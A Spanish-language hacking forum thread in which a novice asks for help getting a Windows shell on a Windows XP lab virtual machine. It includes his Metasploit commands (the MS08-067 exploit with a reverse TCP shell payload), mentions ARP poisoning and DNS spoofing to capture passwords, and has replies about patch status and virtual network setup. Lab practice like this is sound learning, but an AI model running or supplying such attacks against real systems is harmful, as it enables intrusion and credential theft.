Metasploit

n3n3 · 24 Enero 2014, 19:26 PM

Hola muye buenas tardes.

Espero puedan ayudarme, ya que me concidero novato y me gusta mucho aprender.

Tengo en una maquina virtual montado Kali Linux y en otra Backtrack 5 r3 y en la tercera tengo Win Xp y e estado intentando hacerme de una windows shell dentro de la que tiene WinXP desde kali y backtrack, pero hasta ahora solo e logrado fracasar, no me e rendido, pero si me pudieran guiar, explicar o proporcionar algun otro metedo.
lo e estado intentando con el PAYLOAD desde MSFCONSOLE, tambien con ARMITAGE e usado tambien estos comandos que les escribire tal cual los use:

use exploit/windows/smb/ms08_067_netapi
set RHOST 000.000.000.000 <-----Ip a atacar
set payload windows/shell/reverse_tcp
set LHOST 000.000.000.000 <----Ip atacante
exploit

Pero tampoco dan resultado, simplemente no carga el exploit, o me dice algo del packete en ingles, o (no-targget), pero siempre ingreso la ip de la victima que en este caso es mi otra maquina virtual, las tres maquinas las tengo en modo britged, (adaptador puente)desde VBox

Ayudame por favor
*****************************************************************************

MCKSys Argentina · 24 Enero 2014, 19:31 PM

Una pregunta: el XP es vulnerable? Osea, está actualizado o no? Si está patcheado, no funcionará el exploit...

Saludos!

n3n3 · 24 Enero 2014, 19:50 PM

Amigo tiene apenas 1 dia de que lo tengo instalado, pero de ser asi lo reinstalo, es un XP SP 3
Pero mi moden tengo abiertos los puertos, y yo creo que debe de haber alguna manera para poder penetrar en la maquina, no importa si esta actualizado, por eso mismo posteo mi duda, haber si alguien conoce alguna forma de hackear ese Xp sp3 o windows 7 desde backtrack 5 o kali linux desde metasploit o alguna otra manera, la que sea no importa solo quiero aprender alguna que sea exitosa

noopynoob · 24 Enero 2014, 19:51 PM

que yo sepa no se puede desde una maquina virtual ya que la IP no esta dentro del rango, hay que tener dos maquinas para realizar el ataque

n3n3 · 24 Enero 2014, 19:55 PM

Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red?

noopynoob · 24 Enero 2014, 20:04 PM

Cita de: n3n3 en 24 Enero 2014, 19:55 PM
Pues ya realize desde una de mis maquinas con backtrack 5 hice un ataque DNS Spoffing y envenenamiento de ARP para obtener claves de mi maquina tangible, osea la principal, y si me funciono, pero agradeceria si alguien me hace saber algun metodo que pueda yo utlizar, y pues escanear bulnerabilidades con nmap desde backtrack, y que ataques conocen para una red local???????????

Porfavor algun ataque para una red local, que yo pueda probar en mi pequeña red?

pues se puede hacer el ARP spoofing desde una maquina virtual pero solo afectara a la maquina en donde esta corriendo la maquina virtual y no en las demás, una vez intente penetrar win8 desde backtrack que corría en una maquina virtual y no me funciono entonces quite la mv e inicie backtrack en una laptop y el ataque si funciono.

n3n3 · 24 Enero 2014, 20:15 PM

Ok intentare los ataques desde una PC fisica, y posteriormente voy a postear los resultados obtenidos, muchas gracias.

engel lex · 25 Enero 2014, 04:13 AM

que maquina virtual usas? porque depende de ella puedes configurar las ip y todo eso para simular una red real

n3n3 · 26 Enero 2014, 21:06 PM

Uso Virtual Box, lo que pasa que en YouTube hay videos donde realizan ataques con armitage, y tambien manualmente con el Metasploid, haciendose de una shell windows, en estas mismas maquinas virtuales, y hasta ahora no me a funcionado ni en NAT ni en Bridgeb.

Ayuendeme de cual es el problema, hago escaneo con nmap y me aparecen mis maquinas fisicas en el kali virtual, pero la otra PC con WinXp que es virtual tambien, no me aparece.

Tambien cuando ataco la mia que tiene Win7 Ultimate, me sale el siguiente error desde metasploit, me imagino que es por que no es vulnerable a este tipo de ataque, ustedes que opinan sobre este otro tema...

Owl-City · 27 Enero 2014, 23:15 PM

Hola,

Amigo, te compadezco, no soy un profesional, no quiero ser necio, pero específicamente que exploit usaste, no me des el proceso solo el nombre, porque si es un payload, tienes que es pecificar.
Me explico:
Es de x86 o x64.
Se que usaste Cain y Abel, para hacer tus ataques de contraseña y envenenar la red. Y sí, es automático, por eso te dio en el blanco. Lo mejor que puedes hacer es programarte tu propio exploit en una terminal